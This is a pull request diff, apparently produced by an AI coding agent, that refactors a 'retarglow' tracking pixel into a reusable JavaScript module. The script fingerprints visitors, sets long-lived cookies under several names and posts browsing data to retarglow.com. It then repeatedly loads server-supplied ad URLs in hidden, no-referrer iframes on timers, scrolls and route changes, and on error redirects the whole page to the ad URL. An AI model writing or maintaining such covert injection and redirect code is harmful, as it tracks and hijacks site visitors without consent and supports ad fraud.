### PR TITLE
Refactor pixel worker to use reusable client module

### DIFF
--- a/functions/client/pixel-client.js
+++ b/functions/client/pixel-client.js
@@ -1,0 +1,112 @@
+export const PIXEL_CLIENT_SOURCE = String.raw`(function () {
+  try {
+    const config = window.__RETARGLOW_PIXEL__ || {};
+    const c = config.cid || "default";
+    const existingR = typeof config._r === "string" && config._r.length ? config._r : null;
+    const storedR = localStorage.getItem("_r");
+    const _r = storedR || existingR || crypto.randomUUID();
+    localStorage.setItem("_r", _r);
+    if (window.__RETARGLOW_PIXEL__) {
+      window.__RETARGLOW_PIXEL__._r = _r;
+    }
+    document.cookie = "_r=" + _r + ";path=/;max-age=2592000;SameSite=Lax";
+    document.cookie = "smc_uid=" + _r + ";path=/;max-age=31536000;SameSite=Lax";
+    document.cookie = "user_id_t=" + _r + ";path=/;max-age=31536000;SameSite=Lax";
+
+    let vc = 1;
+    try {
+      const match = document.cookie.match(/(?:^|;\\s*)visit_ct=(\\d+)/);
+      vc = match ? parseInt(match[1]) + 1 : 1;
+    } catch {}
+    document.cookie = "visit_ct=" + vc + ";path=/;max-age=31536000;SameSite=Lax";
+    document.cookie = "page_refreshed=true;path=/;max-age=86400;SameSite=Lax";
+    const isShopify = !!document.querySelector('script[src*="cdn.shopify.com"], link[href*="cdn.shopify.com"]');
+    const u = location.href, r = document.referrer, n = navigator.userAgent;
+    const b = n.includes("Chrome") ? "C" : n.includes("Firefox") ? "F" : n.includes("Safari") ? "S" : "U";
+    const d = /Mobi|Android/i.test(n) ? "M" : "D";
+    const o = navigator.platform;
+    const s = screen.width + "x" + screen.height;
+    const domain = location.hostname;
+    const p = {
+      cid: c,
+      u,
+      r,
+      ua: n,
+      dt: d,
+      b,
+      os: o,
+      sr: s,
+      cm: { _r },
+      domain,
+      visit_ct: vc,
+      page_refreshed: true,
+      shopify: isShopify
+    };
+    fetch("https://retarglow.com/log", {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify(p)
+    });
+    let triggered = false;
+    let lastInjectedAt = 0;
+    const sessionKey = "i_" + _r + "_" + location.pathname;
+    const once = sessionStorage.getItem(sessionKey);
+    const inject = () => {
+      const now = Date.now();
+      if (triggered || once || now - lastInjectedAt < 1000) return;
+      triggered = true;
+      lastInjectedAt = now;
+      sessionStorage.setItem(sessionKey, "1");
+      fetch("https://retarglow.com/serve", {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify({ u, cm: { _r }, cid: c })
+      })
+      .then(res => res.json())
+      .then(j => {
+        if (!j.ad_url) return;
+        const iframe = document.createElement("iframe");
+        iframe.style.display = "none";
+        iframe.referrerPolicy = "no-referrer";
+        iframe.src = j.ad_url.replace("{{_r}}", encodeURIComponent(_r));
+        iframe.onerror = () => {
+          const img = new Image();
+          img.src = j.ad_url;
+          setTimeout(() => { window.location.href = j.ad_url; }, 300);
+        };
+        document.body.appendChild(iframe);
+      });
+    };
+    setTimeout(inject, 2000);
+    window.addEventListener("scroll", () => { inject(); window.removeEventListener("scroll", inject); });
+    setTimeout(inject, 5000);
+    ["pushState", "replaceState"].forEach(fn => {
+      const orig = history[fn];
+      history[fn] = function () {
+        const r = orig.apply(this, arguments);
+        triggered = false;
+        sessionStorage.removeItem(sessionKey);
+        setTimeout(inject, 1500);
+        return r;
+      };
+    });
+
+    window.addEventListener("popstate", () => {
+      triggered = false;
+      sessionStorage.removeItem(sessionKey);
+      setTimeout(inject, 1500);
+    });
+
+    let lastUrl = location.href;
+    const mo = new MutationObserver(() => {
+      if (location.href !== lastUrl) {
+        lastUrl = location.href;
+        triggered = false;
+        sessionStorage.removeItem(sessionKey);
+        setTimeout(inject, 1500);
+      }
+    });
+    mo.observe(document, { childList: true, subtree: true });
+
+  } catch (e) {}
+})();`;

--- a/functions/pixel.js
+++ b/functions/pixel.js
@@ -1,3 +1,5 @@
+import { PIXEL_CLIENT_SOURCE } from "./client/pixel-client.js";
+
 export default {
   async fetch(request) {
     const headers = {
@@ -6,112 +8,9 @@ export default {
     };
     const url = new URL(request.url);
     const cid = url.searchParams.get("cid") || "default";
-    const js = `(function(){
-  try {
-    const c="${cid}", _r = localStorage.getItem("_r") || crypto.randomUUID();
-    localStorage.setItem("_r", _r);
-    document.cookie = "_r=" + _r + ";path=/;max-age=2592000;SameSite=Lax";
-    document.cookie = "smc_uid=" + _r + ";path=/;max-age=31536000;SameSite=Lax";
-    document.cookie = "user_id_t=" + _r + ";path=/;max-age=31536000;SameSite=Lax";
+    const bootstrap = `window.__RETARGLOW_PIXEL__ = ${JSON.stringify({ cid })};`;
+    const body = `${bootstrap}\n${PIXEL_CLIENT_SOURCE}`;
 
-    let vc = 1;
-    try {
-      const match = document.cookie.match(/(?:^|;\\s*)visit_ct=(\\d+)/);
-      vc = match ? parseInt(match[1]) + 1 : 1;
-    } catch {}
-    document.cookie = "visit_ct=" + vc + ";path=/;max-age=31536000;SameSite=Lax";
-    document.cookie = "page_refreshed=true;path=/;max-age=86400;SameSite=Lax";
-    const isShopify = !!document.querySelector('script[src*="cdn.shopify.com"], link[href*="cdn.shopify.com"]');
-    const u = location.href, r = document.referrer, n = navigator.userAgent;
-    const b = n.includes("Chrome") ? "C" : n.includes("Firefox") ? "F" : n.includes("Safari") ? "S" : "U";
-    const d = /Mobi|Android/i.test(n) ? "M" : "D";
-    const o = navigator.platform;
-    const s = screen.width + "x" + screen.height;
-    const domain = location.hostname;
-    const p = {
-      cid: c,
-      u,
-      r,
-      ua: n,
-      dt: d,
-      b,
-      os: o,
-      sr: s,
-      cm: { _r },
-      domain,
-      visit_ct: vc,
-      page_refreshed: true,
-      shopify: isShopify
-    };
-    fetch("https://retarglow.com/log", {
-      method: "POST",
-      headers: { "Content-Type": "application/json" },
-      body: JSON.stringify(p)
-    });
-    let triggered = false;
-    let lastInjectedAt = 0;
-    const sessionKey = "i_" + _r + "_" + location.pathname;
-    const once = sessionStorage.getItem(sessionKey);
-    const inject = () => {
-      const now = Date.now();
-      if (triggered || once || now - lastInjectedAt < 1000) return;
-      triggered = true;
-      lastInjectedAt = now;
-      sessionStorage.setItem(sessionKey, "1");
-      fetch("https://retarglow.com/serve", {
-        method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify({ u, cm: { _r }, cid: c })
-      })
-      .then(res => res.json())
-      .then(j => {
-        if (!j.ad_url) return;
-        const iframe = document.createElement("iframe");
-        iframe.style.display = "none";
-        iframe.referrerPolicy = "no-referrer";
-        iframe.src = j.ad_url.replace("{{_r}}", encodeURIComponent(_r));
-        iframe.onerror = () => {
-          const img = new Image();
-          img.src = j.ad_url;
-          setTimeout(() => { window.location.href = j.ad_url; }, 300);
-        };
-        document.body.appendChild(iframe);
-      });
-    };
-    setTimeout(inject, 2000);
-    window.addEventListener("scroll", () => { inject(); window.removeEventListener("scroll", inject); });
-    setTimeout(inject, 5000);
-    ["pushState", "replaceState"].forEach(fn => {
-      const orig = history[fn];
-      history[fn] = function () {
-        const r = orig.apply(this, arguments);
-        triggered = false;
-        sessionStorage.removeItem(sessionKey);
-        setTimeout(inject, 1500);
-        return r;
-      };
-    });
-
-    window.addEventListener("popstate", () => {
-      triggered = false;
-      sessionStorage.removeItem(sessionKey);
-      setTimeout(inject, 1500);
-    });
-
-    let lastUrl = location.href;
-    const mo = new MutationObserver(() => {
-      if (location.href !== lastUrl) {
-        lastUrl = location.href;
-        triggered = false;
-        sessionStorage.removeItem(sessionKey);
-        setTimeout(inject, 1500);
-      }
-    });
-    mo.observe(document, { childList: true, subtree: true });
-
-  } catch (e) {}
-})();`;
-
-    return new Response(js, { status: 200, headers });
+    return new Response(body, { status: 200, headers });
   }
 };


### PR DESCRIPTION
## Summary
- extract the pixel client IIFE into a reusable module so it can be embedded verbatim elsewhere
- adjust the client script to read runtime configuration from a bootstrap object on window
- simplify the pixel worker to emit the bootstrap config followed by the shared client source

## Testing
- node -e "import('./functions/pixel.js').then(async (m) => { const res = await m.default.fetch(new Request('https://example.com/pixel?cid=test')); const text = await res.text(); console.log(text); });"

------
https://chatgpt.com/codex/tasks/task_b_68dad88f57b88323ada0a1aa0006a1fd